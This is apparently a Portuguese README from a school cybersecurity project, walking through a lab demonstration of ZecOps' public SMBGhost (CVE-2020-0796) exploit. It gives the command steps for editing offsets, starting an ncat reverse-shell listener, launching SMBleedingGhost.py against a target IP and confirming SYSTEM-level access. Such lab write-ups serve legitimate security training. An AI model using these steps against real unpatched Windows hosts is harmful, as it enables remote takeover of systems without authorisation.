Prova de conceito educacional de exploit para CVE-2020-0796 (SMBGhost) demonstrando RCE pré-autenticação no Windows SMBv3. Inclui configuração de laboratório passo a passo, cálculo de offset e execução de reverse shell para treinamento controlado de segurança cibernética.
Este projeto demonstra uma prova de conceito (PoC) da exploração do CVE-2020-0796, também conhecido como SMBGhost – uma vulnerabilidade crítica de execução remota de código (RCE) sem autenticação que afeta sistemas Windows 10 e Windows Server que utilizam SMBv3. Isso foi desenvolvido como parte de um projeto escolar de segurança cibernética. Todo o crédito do código de exploração vai para a ZecOps. Eu apenas usei e adaptei para fins educacionais para demonstrar a exploração do CVE-2020-0796 em um ambiente de laboratório controlado.
Para replicar esta demonstração, a seguinte configuração é necessária:
SMBleedingGhost.py por ZecOpscalc_target_offsets.bat por ZecOpsAbra o Prompt de Comando em ambas as máquinas virtuais, Atacante e Alvo.
Execute o seguinte comando em cada máquina:
ipconfig
CVE-2020-0796-RCE-POC-master.calc_target_offsets.batCVE-2020-0796-RCE-POC-master.SMBleedingGhost.py e abra com o Bloco de Notas.SMBleedingGhost.py, role para baixo e localize a seção que começa com OFFSETS = {.Abra um novo Prompt de Comando e execute:
ncat -lvp 4321
4321 para receber um shell reverso da Máquina Alvo após uma exploração bem-sucedida.cd Desktop
cd CVE-2020-0796-RCE-POC-master
dir
python SMBleedingGhost.py <target_ip> <attacker_ip> <port>
Exemplo usado nesta demonstração:
python SMBleedingGhost.py 192.168.18.61 192.168.18.62 4321
192.168.18.61: IP da Máquina Alvo192.168.18.62: IP da Máquina do Atacante4321: Porta usada no ouvinte netcatSe bem-sucedida, a janela do netcat mostrará:
Microsoft Windows [Version 10.0.18362.356]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Isso confirma que:
Você pode validar o acesso executando:
whoami
Isso resultará em:
whoami
nt authority\system
Isso significa que a Máquina do Atacante agora tem privilégios de nível de sistema na Máquina Alvo.
Você também pode executar:
ipconfig
Para verificar se você está interagindo com a rede da Máquina Alvo.

Nota: A Máquina Alvo pode travar após a exploração. Se isso acontecer, você pode reiniciá-la. A sessão do atacante precisará ser restabelecida após a reinicialização.
Esta demonstração é baseada no proof-of-concept publicamente disponível desenvolvido por ZecOps.
Todo o crédito do código de exploração vai para a ZecOps. Eu apenas usei e adaptei para fins educacionais para demonstrar a exploração do CVE-2020-0796 em um ambiente de laboratório controlado.
Este repositório foi criado apenas para fins educacionais.
Todas as ferramentas, scripts e técnicas demonstradas destinam-se a ajudar a entender vulnerabilidades de segurança cibernética em um ambiente de laboratório controlado. Não tente usar qualquer um dos materiais fornecidos em sistemas ou redes que você não possui ou para os quais não tem permissão explícita para testar.
Qualquer uso indevido do software não será de responsabilidade do autor.